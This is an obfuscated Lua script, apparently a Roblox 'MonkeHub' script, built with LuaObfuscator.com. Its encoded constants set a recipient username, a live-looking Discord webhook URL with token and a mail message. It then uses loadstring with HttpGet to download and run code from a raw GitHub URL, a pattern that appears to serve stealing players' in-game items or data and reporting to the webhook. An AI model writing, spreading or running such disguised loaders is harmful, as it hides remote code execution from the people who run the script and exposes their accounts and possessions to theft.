--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v84=v2(v0(v30,16));if v19 then local v90=v5(v84,v19);v19=nil;return v90;else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=(0 + 0) -0 ;local v86;while true do if (v85==((877 -(282 + 595)) -0)) then v86=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + (1711 -(1523 + 114))))) -(v32-(569 -(367 + 201)))) + ((834 + 94) -(214 + 713)))) ;return v86-(v86%1) ;end end else local v87=2^(v32-(1 + (0 -0))) ;return (((v31%(v87 + v87))>=v87) and 1) or 0 ;end end local function v21()local v34=1065 -(68 + 978 + 19) ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=(27 + 91) -((989 -(892 + 65)) + 85) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v37 * (469 -213)) + v36 ;end local function v23()local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(351 -(87 + 263))) then return (v42 * 16777216) + (v41 * (65716 -(67 + 113))) + (v40 * (188 + (182 -114))) + v39 ;end if (v38==(0 -(0 -0))) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;v38=953 -(802 + 150) ;end end end local function v24()local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(998 -(915 + 82))) then v46=2 -1 ;v47=(v20(v45,1 + 0 ,26 -6 ) * (2^(1219 -(1069 + 118)))) + v44 ;v43=4 -2 ;end if (v43==(3 -1)) then v48=v20(v45,4 + (1155 -(116 + 1022)) ,31);v49=((v20(v45,56 -24 )==(1 + 0)) and  -(792 -((1531 -1163) + 423))) or (3 -2) ;v43=3;end if (v43==(18 -(10 + 8))) then v44=v23();v45=v23();v43=3 -2 ;end if (v43==(445 -(416 + 26))) then if (v48==0) then if (v47==0) then return v49 * ((0 + 0) -0) ;else local v97=0 + 0 ;while true do if (v97==((0 -0) -0)) then v48=1;v46=438 -((514 -369) + 293) ;break;end end end elseif (v48==2047) then return ((v47==(430 -(44 + 386))) and (v49 * (1/(1486 -((1857 -(814 + 45)) + 488))))) or (v49 * NaN) ;end return v8(v49,v48-(325 + 698) ) * (v46 + (v47/((2 + 0)^(824 -(201 + 571))))) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v66=1 + 0 , #v51 do v52[v66]=v2(v1(v3(v51,v66,v66)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;while true do local v68=0 + 0 ;local v69;while true do if ((0 -0)~=v68) then else v69=0 -0 ;while true do if (v69==(0 -0)) then if (v53==3) then local v98=0 + 0 ;local v99;while true do if (v98==(0 + 0)) then v99=584 -(57 + 527) ;while true do if ((1427 -(41 + 1386))==v99) then for v151=397 -(115 + 281) ,v23() do v55[v151-1 ]=v28();end return v57;end end break;end end end if (0~=v53) then else v54={};v55={};v56={};v53=2 -1 ;end v69=1;end if (v69==(1 + 0)) then if (v53==(105 -(17 + 86))) then local v100=0 -0 ;local v101;while true do if ((0 -0)==v100) then v101=0;while true do if (v101==(867 -(550 + 317))) then for v153=167 -(122 + 44) ,v58 do local v154=0 -0 ;local v155;local v156;while true do if (v154~=(0 -0)) then else local v170=0 -0 ;while true do if (v170==(2 -1)) then v154=286 -(134 + 151) ;break;end if (v170==(0 -0)) then v155=v21();v156=nil;v170=1666 -(970 + 695) ;end end end if (1==v154) then if (v155==1) then v156=v21()~=(0 -0) ;elseif (v155==(2 + 0)) then v156=v24();elseif (v155==3) then v156=v25();end v59[v153]=v156;break;end end end v57[3]=v21();v101=1991 -(582 + 1408) ;end if (v101~=(1258 -(1043 + 214))) then else for v157=3 -2 ,v23() do local v158=0 -0 ;local v159;local v160;local v161;local v162;while true do if (v158~=1) then else v161=nil;v162=nil;v158=7 -5 ;end if (v158==(0 -0)) then v159=0;v160=nil;v158=2 -1 ;end if (v158~=(582 -(361 + 219))) then else while true do if ((1825 -(1195 + 629))~=v159) then else v162=nil;while true do if ((0 -0)==v160) then v161=241 -(187 + 54) ;v162=nil;v160=781 -(162 + 618) ;end if (v160~=1) then else while true do if (v161==(0 + 0)) then v162=v21();if (v20(v162,1 + 0 ,1)==(0 + 0)) then local v173=0 -0 ;local v174;local v175;local v176;local v177;local v178;while true do if (v173~=(1 -0)) then else v176=nil;v177=nil;v173=1 + 1 ;end if (2~=v173) then else v178=nil;while true do if (v174~=(1636 -(1373 + 263))) then else v175=0;v176=nil;v174=1;end if (v174~=(128 -(116 + 10))) then else while true do if (v175==(1001 -(451 + 549))) then local v180=0;local v181;while true do if (v180==0) then v181=0;while true do if (v181==(0 + 0)) then local v189=0 -0 ;while true do if ((1 -0)==v189) then v181=1;break;end if (v189==0) then v178={v22(),v22(),nil,nil};if (v176==(0 + 0)) then local v194=0;local v195;local v196;while true do if (v194==(341 -(218 + 123))) then v195=0;v196=nil;v194=1582 -(1535 + 46) ;end if (v194==(1 + 0)) then while true do if (v195==(0 -0)) then v196=0 + 0 ;while true do if (v196~=(560 -(306 + 254))) then else v178[3]=v22();v178[1555 -(1126 + 425) ]=v22();break;end end break;end end break;end end elseif (v176==(1 + 0)) then v178[11 -8 ]=v23();elseif (v176==(1123 -(118 + 1003))) then v178[5 -2 ]=v23() -(2^(1483 -(899 + 568))) ;elseif (v176==(2 + 1)) then local v199=0;local v200;local v201;while true do if (v199==(2 -1)) then while true do if (v200==(377 -(142 + 235))) then v201=0 -0 ;while true do if (v201==(603 -(268 + 335))) then v178[3]=v23() -(2^(4 + 12)) ;v178[4]=v22();break;end end break;end end break;end if (v199==(290 -(60 + 230))) then v200=572 -(426 + 146) ;v201=nil;v199=1 -0 ;end end end v189=1 + 0 ;end end end if ((1 + 0)==v181) then v175=2 + 0 ;break;end end break;end end end if (v175~=(1459 -(282 + 1174))) then else if (v20(v177,2 + 1 ,3)~=(812 -(569 + 242))) then else v178[11 -7 ]=v59[v178[1 + 3 ]];end v54[v157]=v178;break;end if (v175~=2) then else local v183=0;local v184;while true do if (v183~=(1024 -(706 + 318))) then else v184=0 -0 ;while true do if (v184~=1) then else v175=1254 -(721 + 530) ;break;end if (v184==0) then if (v20(v177,1272 -(945 + 326) ,1)==(2 -1)) then v178[2 + 0 ]=v59[v178[2]];end if (v20(v177,702 -(271 + 429) ,2 + 0 )==(4 -3)) then v178[756 -(239 + 514) ]=v59[v178[2 + 1 ]];end v184=1501 -(1408 + 92) ;end end break;end end end if (v175==0) then local v185=1086 -(461 + 625) ;local v186;while true do if (v185~=(0 + 0)) then else v186=0 + 0 ;while true do if (v186~=(2 -1)) then else v175=1289 -(993 + 295) ;break;end if (v186~=(0 + 0)) then else v176=v20(v162,2,3);v177=v20(v162,1175 -(418 + 753) ,6);v186=1;end end break;end end end end break;end if (v174~=(1 + 0)) then else local v179=0 -0 ;while true do if (v179==(0 -0)) then v177=nil;v178=nil;v179=1 + 0 ;end if (v179~=(1 + 0)) then else v174=1 + 1 ;break;end end end end break;end if (v173~=(0 + 0)) then else v174=0 + 0 ;v175=nil;v173=337 -(144 + 192) ;end end end break;end end break;end end break;end if ((529 -(406 + 123))~=v159) then else local v172=1769 -(1749 + 20) ;while true do if (v172==(1 + 0)) then v159=1 + 0 ;break;end if (v172==(1322 -(1249 + 73))) then v160=0;v161=nil;v172=1 + 0 ;end end end end break;end end end v53=3;break;end end break;end end end if (v53==(1 + 0)) then local v102=1580 -(1183 + 397) ;while true do if (v102~=(2 -1)) then else v59={};v53=2 + 0 ;break;end if (v102==(1145 -(466 + 679))) then v57={v54,v55,nil,v56};v58=v23();v102=1901 -(106 + 1794) ;end end end break;end end break;end end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v70=v63;local v71=v64;local v72=v65;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + 1 ];else v80[v88]=v77[v88 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v89=0;while true do if (v89==0) then v82=v70[v74];v83=v82[1];v89=1;end if (v89==1) then if (v83<=4) then if (v83<=1) then if (v83==0) then v80[v82[2]]=v62[v82[3]];else v80[v82[2]]();end elseif (v83<=2) then v80[v82[2]]=v82[3];elseif (v83==3) then local v115;local v116,v117;local v118;local v119;v80[v82[2]][v82[3]]=v82[4];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v62[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v62[v82[3]];v74=v74 + 1 ;v82=v70[v74];v119=v82[2];v118=v80[v82[3]];v80[v119 + 1 ]=v118;v80[v119]=v118[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v119=v82[2];v116,v117=v73(v80[v119](v13(v80,v119 + 1 ,v82[3])));v75=(v117 + v119) -1 ;v115=0;for v144=v119,v75 do local v145=0;while true do if (v145==0) then v115=v115 + 1 ;v80[v144]=v116[v115];break;end end end v74=v74 + 1 ;v82=v70[v74];v119=v82[2];v80[v119]=v80[v119](v13(v80,v119 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];do return;end else local v131=0;local v132;local v133;while true do if (v131==1) then v80[v132 + 1 ]=v133;v80[v132]=v133[v82[4]];break;end if (v131==0) then v132=v82[2];v133=v80[v82[3]];v131=1;end end end elseif (v83<=7) then if (v83<=5) then local v107=v82[2];local v108,v109=v73(v80[v107](v13(v80,v107 + 1 ,v82[3])));v75=(v109 + v107) -1 ;local v110=0;for v113=v107,v75 do local v114=0;while true do if (v114==0) then v110=v110 + 1 ;v80[v113]=v108[v110];break;end end end elseif (v83==6) then v62[v82[3]]=v80[v82[2]];else v80[v82[2]][v82[3]]=v82[4];end elseif (v83<=8) then local v111=0;local v112;while true do if (v111==0) then v112=v82[2];v80[v112]=v80[v112](v13(v80,v112 + 1 ,v75));break;end end elseif (v83==9) then v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v62[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v62[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v62[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v62[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]][v82[3]]=v82[4];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v62[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]][v82[3]]=v82[4];else do return;end end v74=v74 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!103O0003083O00557365724E616D6503083O00416E67727934323903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135312O3436343635343935393537352O342F6D612D6A342O694F2D76615768657066386273574A76315F62446B617472364B6B5530376645356B66646232376C7967563471704A6F4D6578725A4B71555043637A647203093O00557365724E616D653203023O005F47030B3O004D61696C4D652O7361676503043O006C6F2O6C030C3O004C6F6164696E675469746C6503083O004D6F6E6B65487562030B3O00576562682O6F6B4E616D6503083O004D6F6E6B65485542030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F69642O6B2F6D61696E2F692O643O6B3200143O0012093O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O0009000A00124O00063O0030033O000B000C00124O000D3O00122O0001000E3O00202O00010001000F00122O000300106O000100039O0000026O000100016O00017O00",v9(),...);
